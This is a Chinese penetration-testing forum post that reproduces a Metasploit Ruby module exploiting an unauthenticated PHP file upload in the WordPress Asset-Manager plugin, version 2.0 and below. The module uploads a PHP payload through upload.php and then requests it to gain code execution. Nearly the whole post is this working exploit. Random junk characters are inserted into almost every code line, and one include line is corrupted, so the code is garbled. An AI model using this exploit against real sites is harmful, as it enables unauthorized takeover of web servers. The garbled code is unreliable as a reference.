找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2555|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 @& T' q) e1 c& a
2 Z' {9 U" j8 M# y/ G
##7 r5 a6 G% H+ O; O
# This file is part of the Metasploit Framework and may be subject to
1 O+ |1 c0 a; p$ P/ Q" O# redistribution and commercial restrictions. Please see the Metasploit
) u. e2 w# A' A3 Z1 T5 }* D# Q# Framework web site for more information on licensing and terms of use.9 t7 O* x1 ~  o% [1 ?. ]! G2 `3 ~6 h
#   http://metasploit.com/framework/6 V6 ]% h$ b+ F1 J) r' e
##
: T+ H4 l% \9 \6 C
# T8 r8 q1 o2 F- b* D% A( srequire 'msf/core'
' G  v( J7 s, orequire 'msf/core/exploit/php_exe'
' I9 J- F8 V" ]! M3 [ + S6 q. \9 j  d& G3 Z, y- \, g* [
class Metasploit3 < Msf::Exploit::Remote% n- ~+ u: ^, G! n
  Rank = ExcellentRanking5 M% h% I5 n" g! A2 {' [
8 B( L6 l" `- a- }
  include Msf::Exploit::Remote::HttpClient4 U3 l  v$ e* M- k
  include Msf::Exploit:hpEXE: A, R) }+ f& ]4 s' F0 C' e
6 ^+ Y1 R4 ^5 l1 T0 L( {) D3 k) `
  def initialize(info = {})6 O& U; U+ Y; P6 }5 b6 S: E
    super(update_info(info,
* @4 t. y5 d" w$ ^: Z, _- n( U: }      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',$ j5 V: Q& f0 M) b
      'Description'    => %q{
4 {( }2 |& l: d3 X, M5 z9 h        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress. H! s( `9 w+ n6 N  H, b
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a; |0 L& @8 ]  C) }% G& j
        temp directory without authentication, which results in arbitrary code execution.
: Q3 s) i  `/ x0 j8 V! K& A      },
; p3 x! d9 o: B; r      'Author'         =>
- t8 d  L5 x* B3 m4 a        [
! ~2 R: R' e: P1 _          'Sammy FORGIT', # initial discovery
7 e6 I6 X+ s  u. p1 X. L3 u( p          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
( C9 u, ]/ }: T' I$ q2 D8 r& I, P/ s        ],. m. P9 i- t/ C: y2 h
      'License'        => MSF_LICENSE,
( p9 [) ?  G- o# @6 F" g      'References'     =>
) s' \0 z6 L3 `! t6 E# Q# J* `        [
$ r. Z8 N; z$ P+ C4 Y7 d5 J7 ~          [ 'OSVDB', '82653' ],
! b. l( M' y9 |& Z4 N- S$ i) f- u          [ 'BID', '53809' ],
( v' [2 x  l5 _* R          [ 'EDB', '18993' ],
' j2 E& J6 g1 \          [ 'URL', 'http:// www.myhack58.com /' ]
8 B( K: h: N6 G+ F! X$ A6 [( F        ],
4 a+ `8 q" J7 p" c5 o( z9 }2 Q; _; k      'Payload'       =>
# ^) ^# a! X: p! x1 q5 U+ G        {/ \$ Y0 Z8 m6 y. X1 _+ H1 ?0 G# q
          'BadChars' => "\x00",
+ K/ G$ g* a0 p' U$ G, _: p        },
: D$ @$ z$ F! i5 g      'Platform'       => 'php',1 n7 W+ Q9 t! ~  a; _
      'Arch'           => ARCH_PHP," d$ A1 {% x- R- A$ @
      'Targets'        =>
' E( E8 p- v+ y2 r9 V        [# p4 I1 ^: e, z' Q0 O
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],5 l+ O& s7 ?) C, e+ ^- V
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]1 i" ~0 Q4 @4 s) ]
        ],
) B0 U! Q- ~& k* ?) Z- \5 ^; a      'DefaultTarget' => 0,: z& r0 L, x7 x% L% F
      'DisclosureDate' => 'May 26 2012'))
% ~6 |, S6 i8 x, X; e% d 4 X& X3 @8 F+ e: V7 q) y7 z
    register_options(+ Y6 Z- d! Z5 Z7 i+ ^  }/ ^
      [) v$ O+ L% |0 c& Y* K
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])& C1 d6 J" M9 y8 c" w$ k
      ], self.class)* C; d+ G* n; B6 M8 g9 I9 P
  end
4 v9 A9 j/ H: C0 y) y ' ~0 |4 j# p# J' ^! p
  def exploit
: }* g8 J- n/ K    uri =  target_uri.path9 Q0 u, c# r* T1 |2 l6 s) f
    uri << '/' if uri[-1,1] != '/'5 o" k9 u+ {9 s7 s% X! A
    peer = "#{rhost}:#{rport}"7 h$ E0 k# q0 |
    payload_name = "#{rand_text_alpha(5)}.php"% v$ M* x' Y$ m- v
    php_payload = get_write_exec_payload(:unlink_self=>true); h$ t  U3 _' W: E9 _3 {
( v  w6 }2 o3 M* a
    data = Rex::MIME::Message.new
: P$ o# _3 u3 B+ l  H6 ^1 l    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
8 |8 {' {# M0 J% B; z. ~    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! q) y' ?6 |8 T* z : B: @3 c3 A- v+ g
    print_status("#{peer} - Uploading payload #{payload_name}")
9 k# }2 C* H$ i8 b' H+ v/ n1 u    res = send_request_cgi({. W, A, c2 u& w
      'method'  => 'POST',- {4 _& c8 `  ]( A, V: k
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",& l1 X/ Z- S, M4 u
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",5 b# @) Z( l/ c% t: D2 ]
      'data'    => post_data0 {+ ^7 m$ _; r( ~' p
    })
7 Z% _/ p' s: G2 A 2 O4 R6 Q0 d4 p+ M: Q, e- o
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
* i- d! V2 ~/ R* F6 z. N      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")7 i9 V$ g* i- y- ]" g% c
end8 ~4 r# I* ?7 `" G) n4 n

0 d0 S% E2 u9 K: ]    print_status("#{peer} - Executing payload #{payload_name}")
: N: A7 t7 t3 d4 t    res = send_request_raw({: H9 @& ~4 \' A+ f) a
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
# z6 V- _4 k! Z. A. Z( r7 G6 }      'method'  => 'GET'( r/ d0 g! c1 _9 S) L& U
    })
; W) r/ J; U' R0 V
' ~/ R' U+ A$ q    if res and res.code != 200$ j3 V2 K; Y5 q
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")7 b6 R% m5 y3 _5 _% w0 A1 k
    end7 |9 X) @1 J" h& x2 B, S
  end2 q4 R  J3 B! m6 j( v1 k3 G
end
* b" W3 X  L. C( r: c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表